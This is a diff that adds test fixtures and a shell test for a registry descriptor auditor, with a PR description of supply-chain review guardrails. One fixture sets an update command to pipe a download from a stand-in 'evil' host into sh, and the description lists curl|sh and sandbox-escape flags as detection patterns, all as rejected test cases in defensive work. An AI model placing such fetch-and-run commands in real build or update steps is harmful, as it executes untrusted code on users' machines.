+++ b/tests/fixtures/audit/bad-unpinned/flatpark.yml
@@ -1,0 +1,10 @@
+id: com.example.App
+name: Example App
+summary: A test app
+build:
+  manifest: manifest.yml
+update:
+  command: ./resolve-update.sh
+policy:
+  proprietary: true
+  dangerous_permissions: []

--- a/tests/fixtures/audit/bad-unpinned/manifest.yml
+++ b/tests/fixtures/audit/bad-unpinned/manifest.yml
@@ -1,0 +1,11 @@
+app-id: com.example.App
+finish-args:
+  - --share=network
+modules:
+  - name: example
+    buildsystem: simple
+    sources:
+      - type: extra-data
+        filename: app.tar.gz
+        url: https://example.com/app.tar.gz
+        size: 12345

--- a/tests/fixtures/audit/bad-updatecmd/flatpark.yml
+++ b/tests/fixtures/audit/bad-updatecmd/flatpark.yml
@@ -1,0 +1,9 @@
+id: com.example.App
+name: Example App
+summary: A test app
+build:
+  manifest: manifest.yml
+update:
+  command: bash -c 'curl http://evil | sh'
+policy:
+  dangerous_permissions: []

--- a/tests/fixtures/audit/bad-updatecmd/manifest.yml
+++ b/tests/fixtures/audit/bad-updatecmd/manifest.yml
@@ -1,0 +1,12 @@
+app-id: com.example.App
+finish-args:
+  - --share=network
+modules:
+  - name: example
+    buildsystem: simple
+    sources:
+      - type: extra-data
+        filename: app.tar.gz
+        url: https://example.com/app.tar.gz
+        sha256: 0000000000000000000000000000000000000000000000000000000000000000
+        size: 12345

--- a/tests/fixtures/audit/good/flatpark.yml
+++ b/tests/fixtures/audit/good/flatpark.yml
@@ -1,0 +1,10 @@
+id: com.example.App
+name: Example App
+summary: A test app
+build:
+  manifest: manifest.yml
+update:
+  command: ./resolve-update.sh
+policy:
+  proprietary: true
+  dangerous_permissions: []

--- a/tests/fixtures/audit/good/manifest.yml
+++ b/tests/fixtures/audit/good/manifest.yml
@@ -1,0 +1,17 @@
+app-id: com.example.App
+runtime: org.gnome.Platform
+sdk: org.gnome.Sdk
+finish-args:
+  - --share=network
+  - --socket=wayland
+modules:
+  - name: example
+    buildsystem: simple
+    build-commands:
+      - install -D apply_extra /app/bin/apply_extra
+    sources:
+      - type: extra-data
+        filename: app.tar.gz
+        url: https://example.com/app.tar.gz
+        sha256: 0000000000000000000000000000000000000000000000000000000000000000
+        size: 12345

--- a/tests/fixtures/audit/warn-runtimefetch/flatpark.yml
+++ b/tests/fixtures/audit/warn-runtimefetch/flatpark.yml
@@ -1,0 +1,10 @@
+id: com.example.App
+name: Example App
+summary: A test app
+build:
+  manifest: manifest.yml
+update:
+  command: ./resolve-update.sh
+policy:
+  proprietary: true
+  dangerous_permissions: []

--- a/tests/fixtures/audit/warn-runtimefetch/manifest.yml
+++ b/tests/fixtures/audit/warn-runtimefetch/manifest.yml
@@ -1,0 +1,15 @@
+app-id: com.example.App
+finish-args:
+  - --share=network
+modules:
+  - name: example
+    buildsystem: simple
+    build-commands:
+      - install -D apply_extra /app/bin/apply_extra
+      - npm install --prefix x peerflix
+    sources:
+      - type: extra-data
+        filename: app.tar.gz
+        url: https://example.com/app.tar.gz
+        sha256: 0000000000000000000000000000000000000000000000000000000000000000
+        size: 12345

--- a/tests/test_audit_descriptor.sh
+++ b/tests/test_audit_descriptor.sh
@@ -1,0 +1,38 @@
+#!/usr/bin/env bash
+# Tests for scripts/audit-descriptor.mjs — the review-bar guardrails.
+set -u
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+. "$ROOT/tests/lib/assert.sh"
+AUDIT="node $ROOT/scripts/audit-descriptor.mjs"
+F="$ROOT/tests/fixtures/audit"
+
+# G1: a fully-pinned descriptor passes (exit 0)
+$AUDIT "$F/good/flatpark.yml" >/dev/null 2>&1
+assert_eq "$?" "0"
+
+# G1: extra-data without sha256 hard-fails (exit 1, FAIL line)
+out="$($AUDIT "$F/bad-unpinned/flatpark.yml" 2>&1)"; rc=$?
+assert_eq "$rc" "1"
+printf '%s' "$out" | grep -qF "FAIL:" || { echo "FAIL: expected FAIL line for unpinned"; exit 1; }
+
+# G2(a): escape permission hard-fails and names the perm
+out="$($AUDIT "$F/bad-escape/flatpark.yml" 2>&1)"; rc=$?
+assert_eq "$rc" "1"
+printf '%s' "$out" | grep -qF "filesystem=host" || { echo "FAIL: escape perm not reported"; exit 1; }
+
+# update.command must be a simple relative script path
+out="$($AUDIT "$F/bad-updatecmd/flatpark.yml" 2>&1)"; rc=$?
+assert_eq "$rc" "1"
+printf '%s' "$out" | grep -qiF "update.command" || { echo "FAIL: update.command not reported"; exit 1; }
+
+# G3: runtime npm install warns but does NOT fail (exit 0, WARN line)
+out="$($AUDIT "$F/warn-runtimefetch/flatpark.yml" 2>&1)"; rc=$?
+assert_eq "$rc" "0"
+printf '%s' "$out" | grep -qF "WARN:" || { echo "FAIL: expected WARN line for runtime fetch"; exit 1; }
+
+# Regression: every shipping registry app must pass (no hard fail)
+for d in "$ROOT"/registry/*/flatpark.yml; do
+  $AUDIT "$d" >/dev/null 2>&1 || { echo "FAIL: audit hard-failed on shipping app $d"; $AUDIT "$d"; exit 1; }
+done
+
+echo "ok test_audit_descriptor"


### PR DESCRIPTION
## Summary

Adds a written, repeatable **PR review process** for the registry — an
agent-executable runbook plus a small set of deterministic CI guardrails. It
generalizes the recent PR #13 review (a Popcorn Time-class app from a throwaway
account shipping an opaque, submitter-built binary) into something we run every
time, and publishes the bar so contributors and users can see it.

This is the **trust layer on top of** the existing `pr-checks.yml` (which already
validates descriptors, runs tests, and does a no-secrets fork build). It owns the
judgment calls CI can't make: provenance, supply-chain, binary integrity, and
compliance.

## What's in here

**Docs & process**
- `docs/pr-review.md` — the runbook: Phases 0–7, a copy-per-PR review template
  (31 rows), a decision rubric, and a "never execute untrusted code" rule of
  engagement.
- `docs/superpowers/specs/…` + `docs/superpowers/plans/…` — the design spec and
  implementation plan.

**Public copy**
- `site/.../policies.md` — the **Review** section now states the trust model in
  plain language; **AppImage removed** from accepted artifacts.
- `site/.../contributing.md` — a "what we review / what gets rejected" pre-flight
  checklist; resolver example switched off AppImage.

**CI guardrails** — `scripts/audit-descriptor.mjs` (dependency-free Node), wired
into `pr-checks.yml`, plus a new `guard-infra` job.

## Trust model: provenance, not license

Non-FOSS is fine (we already ship proprietary brokers), and open-source apps are
often shipped as official prebuilts (electerm). What matters is **where the bytes
you run come from**:

| Tier | Meaning | Bar |
|---|---|---|
| 1 | source-built / reproducible | shipped code == public source, or reproducible build |
| 2 | official upstream prebuilt | official vendor/upstream URL + unmodified repackage + pinned bytes |
| 3 | opaque third-party / submitter-built | **reject** (this is what PR #13 was) |

## Guardrails

| ID | Check | Severity |
|---|---|---|
| G1 | per-type source pinning (git→commit; archive/extra-data→sha256; extra-data→non-zero size; file→local) | hard-fail |
| G2(a) | sandbox-escape `finish-args` (`--filesystem=host`/`/`, `--talk-name=org.freedesktop.Flatpak`) | hard-fail |
| G2(b) | broad perm not declared in `policy.dangerous_permissions` | warn (until a schema + migration land) |
| G3 | runtime fetch-and-exec (`npm/pip install`, `curl\|sh`) | warn (vendor self-updaters surface here too) |
| — | `update.command` must be a simple relative script path | hard-fail |
| G4 | `guard-infra`: PR touches `.github/`, `scripts/`, a resolver, or a descriptor's `update.command` | fail → maintainer review |

## Testing

- `tests/test_audit_descriptor.sh`: pass/fail fixtures **plus a regression that
  runs the auditor over all 6 shipping apps** — all clean (this caught a real
  manifest-parser bug on IBKR's `mirror-urls` nested list).
- Full suite (`bash tests/run-tests.sh`) green, including the existing
  build/publish e2e tests.

## Heads-up: `guard-infra` will be red on this PR — by design

This PR changes `.github/` and `scripts/`, so the new tripwire correctly flags it
for maintainer review. That red check is the feature working, not a failure.

## Deliberately deferred (backlog, noted in the spec)

`dangerous_permissions` schema + registry migration (unblocks G2(b) → hard),
reproducible-build verification, an AppImage-reject descriptor check, XXE-safe
metainfo validation, and removing `eval` from `check-updates.sh`.

## Notes

- The design incorporates a review pass that corrected an earlier license-based
  model to the provenance model above, refined source-pinning per type, scoped
  the broker vendor-installer exception, and kept G2(b)/G3 warn-only so no
  shipping app false-fails.
- The runbook links resolve to `docs/pr-review.md` and go live once merged.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
